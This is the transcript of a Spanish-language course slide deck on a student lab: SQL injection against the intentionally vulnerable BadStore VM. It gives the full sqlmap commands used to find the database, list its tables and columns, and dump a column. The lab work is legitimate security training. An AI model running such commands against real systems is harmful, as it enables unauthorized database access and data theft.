Ataque por inyección de código sql

Post on 26-Jun-2015

143 views 0 download

Preview:

Click to see full reader
Report this document
SHARE

description

Ataque realizado a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.

Transcript of Ataque por inyección de código sql

Especialización en Seguridad Informática

Ataque por inyección de código SQL,

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Ataque a la base de datos de Badstore

Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.

Ataque a la base de datos de Badstore

una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.

Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db

Se confirma la vulnerabilidad  y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.

Ataque a la base de datos de Badstore

Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb --tables

Ataque a la base de datos de Badstore

una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb --columns

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb -C ldesc --dump

Ataque a la base de datos de Badstore

De esta forma obtenemos toda la información sobre la base de datos de Badstore.

Especialización en Seguridad Informática

GRACIAS POR SU ATENCIÓN

Top related

Aplicaciones WEB vulnerables: Una puerta de entrada … · Búsqueda de información sobre tecnologías y versiones al sitio web redisybd.unam.mx a ... Inyección de código SQL •Es
 Documents
Tema 3 lenguaje sql t-sql 2008
 Education
ATAQUES POR INYECCION DE CODIGO SQL Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de.
 Documents
No sql not only sql
 Software
Descargado de 1/26 · - En una primera fase, se realizó un ataque de inyección de SQL, mediante el cual el atacante pudo averiguar las claves de acceso de los usuarios a los servicios
 Documents
¡¡Judíos al ataque!! o ¡¡ataque a los judíos!!
 Spiritual
sql y no sql
 Education
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
 Software
Vistas En Sql Y My Sql
 Business
Inyección Electrónica - 1 de Mecanica del... · Inyección Electrónica - 1 - Inyección Electrónica - 2 - Inyección Electrónica - 3 - Inyección Electrónica - 4 - Inyección
 Documents
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
 Presentations & Public Speaking
351cnicas de SQL Injection - Un Repaso.doc)Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'., SQL state
 Documents
Inyección de código SQL en MS SQL Server 2005 · código SQL pero centrándose en el motor de bases de datos, MS SQL Server 2005. Se va a obviar si la inyección de código se encuentra
 Documents
Ataques a BB. DD., SQL Injection - Exaforo.com: … · vulnerabilidad de inyección de comandos SQL son los siguientes: ... Utilizados en métodos de llamadas POST – Campos de llamada
 Documents
CURSO ADMINISTRACIÓN WEB SEMANA 6 … · familiarizado con los mecanismos de seguridad presentes en el sistema. ... La inyección de código SQL es una técnica de ataque usada para
 Documents
SQL PROFESOR ISAAC GARCÍA RÍOS. Introducción a SQL ¿Qué significa SQL? ¿Qué es el SQL?
 Documents
Introducción ¿Por qué Inyección SQL? Definición. Objetivos. Concepto clave. Evaluación de riesgos. Ejemplos sencillos. Prueba en vivo Breve descripción.
 Documents
Equipo de prueba de inyección primaria, inyección ...
 Documents
Vento. - Volkswagen México · Alimentación de combustible Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica
 Documents
Instalación de sql 2005 %26 sql management studio
 Documents

Copyright © 2022 FDOCUMENTS